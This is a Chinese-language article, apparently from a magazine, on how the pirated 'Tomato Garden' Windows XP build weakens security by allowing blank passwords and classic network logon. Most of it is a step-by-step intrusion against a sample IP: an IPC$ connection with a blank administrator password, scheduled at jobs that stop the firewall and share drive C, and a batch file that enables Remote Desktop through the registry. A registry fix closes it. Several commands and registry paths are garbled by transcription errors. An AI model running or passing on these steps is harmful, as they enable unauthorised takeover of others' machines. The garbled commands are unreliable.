記得微軟有個(gè)廣告，說的是非授權(quán)軟件就像毒蛇一樣侵蝕著電腦里的重要文件。大家往往對(duì)此不以為然，但事實(shí)上，選用一些非授權(quán)，非原版的軟件確實(shí)會(huì)帶來這種問題，連廣受歡迎的番茄花園也不能避免。

Windows系列的操作系統(tǒng)都提供共享服務(wù)，這些共享服務(wù)的主要通道就是IPC。IPC是Internet ProcessConnection的簡(jiǎn)稱，也稱共享命名管道，它是為了讓進(jìn)程間通信而開放的命名管道，可以通過驗(yàn)證用戶名和密碼獲得相應(yīng)的權(quán)限，在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。這種入侵方式在Windows 2000普及的年代非常流行。

默認(rèn)情況下Windows系列的操作系統(tǒng)都支持空連接，空連接是在沒有信任的情況下與服務(wù)器建立的會(huì)話，換句話說，它是一個(gè)到服務(wù)器的匿名訪問。利用ipc$，連接者可以與目標(biāo)主機(jī)建立一個(gè)空的連接而無需用戶名與密碼(當(dāng)然，對(duì)方機(jī)器必須開了ipc$共享，否則你是連接不上的)，而XP系統(tǒng)限制了空連接導(dǎo)出用戶列表的功能，提高了安全性。

默認(rèn)共享是系統(tǒng)安裝完畢后就自動(dòng)開啟的共享，也叫管理共享，常被管理員用于遠(yuǎn)程管理計(jì)算機(jī)。在Windows2000/XP及其以上版本中。默認(rèn)開啟的共享有“c$”、“d$”、“admin$”、“ipc$”等，我們可以在“運(yùn)行”對(duì)話框中輸入“\\\\計(jì)算機(jī)名\\盤符$”對(duì)這些資源進(jìn)行訪問，以上這些共享就叫做默認(rèn)共享。默認(rèn)共享是只面向管理員組用戶開啟的共享，也就是說只有管理員組的用戶才能訪問這些共享，非管理員組用戶(即使是超級(jí)用戶)不能進(jìn)行訪問。如果我們?cè)趯?duì)話框中輸入的不是管理員組用戶而是其他用戶組的賬戶和密碼(如guest組、backup operators組、power users組等)，系統(tǒng)是不會(huì)讓我們?cè)L問該共享資源的。另外密碼不能為空，否則也連不上XP的默認(rèn)共享。

通常是無法利用IPC入侵原版XP的，最主要的原因是XP與2000在來訪者的權(quán)限設(shè)置上是不同的，在XP中即使有管理員權(quán)限的用戶和密碼也不一定能建立聯(lián)接或復(fù)制文件。

身份驗(yàn)證：XP默認(rèn)是把從網(wǎng)絡(luò)登錄的所有用戶都按來賓賬戶處理的，因此即使管理員從網(wǎng)絡(luò)登錄也只具有來賓的權(quán)限，在XP的(secpol.msc)本地安全設(shè)置/本地策略/安全選項(xiàng)中：

網(wǎng)絡(luò)訪問：本地帳戶的共享和安全模式，有兩個(gè)選項(xiàng)：

經(jīng)典_本地用戶以自己的身份驗(yàn)證

僅來賓_本地用戶以來賓身份驗(yàn)證

當(dāng)番茄花園系統(tǒng)安裝完成后，所有的盤符默認(rèn)共享自動(dòng)關(guān)閉，遠(yuǎn)程桌面關(guān)閉，Remote Registry服務(wù)關(guān)閉，系統(tǒng)只開了IPC$通信命名管道，administrator密碼為空，如果安全選項(xiàng)和空口令設(shè)置和原版相同，則系統(tǒng)也將是安全的，然而問題出來了，點(diǎn)開始/運(yùn)行輸入secpol.msc，展開本地安全設(shè)置/本地策略/安全選項(xiàng)中的“網(wǎng)絡(luò)訪問：本地帳戶的共享和安全模式”，可以發(fā)現(xiàn)被改為“經(jīng)典”。

空口令限制：在XP的注冊(cè)表中有一項(xiàng)limitblank.passworduse，它是用來限制空口令連接的

[HKEY_LOcAL_MAcHINE\\SYSTEM\\ControlSet001\\Control\\LsaJ]

“l(fā)imitblankpassworduse”＝dword:00000001

很明顯看出來，通過導(dǎo)人注冊(cè)表來修改安全設(shè)置。

O:代表空密碼有效。1:代表空密碼無效。

系統(tǒng)默認(rèn)是1，可以有效防止黑客人侵。

而在番茄花園系統(tǒng)中，點(diǎn)開始/運(yùn)行輸入Regedit，展開[HKEY_LoCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa]發(fā)現(xiàn)limitblankpassworduse被改為O。這就意味著，黑客利用了XP管理員的弱口令。

入侵番茄花園版XP，需要針對(duì)XP系統(tǒng)的特點(diǎn)，開啟和關(guān)閉一些服務(wù)(假設(shè)目標(biāo)IP是192.168.1.5)。

1)net use\\\\192.168.1.5\\IPC$\" \"/user:\"admintitrators\"。

看到“命令成功完成”提示，連接成功1

2)net time\\\\192.168.1.5

查查時(shí)間，發(fā)現(xiàn)192.168.1.5的當(dāng)前時(shí)間是2007/5/6下午5:12，出現(xiàn)“命令成功完成”提示。

3)at\\\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”

用at命令啟動(dòng)net stop關(guān)閉對(duì)方計(jì)算機(jī)中的Windows Firewall/Intemet Connection sharing(ICS)服務(wù)以利于關(guān)閉Windows防火墻。

4)執(zhí)行at\\\\192.168.1.5檢查任務(wù)是否安排。

5)再次執(zhí)行net time\\\\192.168.1.5獲得遠(yuǎn)程機(jī)器時(shí)間。

發(fā)現(xiàn)192.168.1.5的當(dāng)前時(shí)間是2007/5/6下午5:29，出現(xiàn)“命令成功完成”提示。

6)執(zhí)行at 17:30\\\\192.168.1.5 net share diskc＝c:

開啟192.168.1.5的C盤共享。

7)打開我的電腦，輸入\\\\192.168.1.5\\diskc，新建一個(gè)文本文件，輸入以下內(nèi)容

echo Windows Registry Editor Version 5.00>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\\Terminal server]>>3389.reg

echo\"fDenyTSConnections\"＝dword:00000000>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\cP]>>3389.reg

echo\"PortNumber\"＝dword:00000d3d>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcpl>>3389.reg

echo\"PortNumber\"＝dword:00000d3d>>3389.reg

regedit/s 3389.reg

del 3389.reg

將文件保存為3389.bat。

8)再次執(zhí)行net time\\\\192.168.1.5獲得遠(yuǎn)程機(jī)器時(shí)間，發(fā)現(xiàn)192.168.1.5的當(dāng)前時(shí)間是2007/5/6下午6:29，出現(xiàn)“命令成功完成”提示。

9)執(zhí)行at 18:30\\\\192.168.1.5c:\\3389.bat。

10)點(diǎn)“開始/所有程序/附件/通訊”，運(yùn)行“遠(yuǎn)程桌面連接”，輸入192.168.1.5即可遠(yuǎn)程操作計(jì)算機(jī)了。

知道漏洞產(chǎn)生的原因后，修補(bǔ)起來也是相當(dāng)?shù)暮?jiǎn)單，關(guān)鍵是修改注冊(cè)表中的limitblankpassworduse和forceguest的鍵值，將下面的內(nèi)容保存為fix.reg，雙擊fix.reg，提示是否導(dǎo)入注冊(cè)表，點(diǎn)確認(rèn)后即可修補(bǔ)漏洞。

Windows Registrv Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa] \"forceguest\"＝dword:00000001 \"limitblankpassworduse\"＝dword:00000001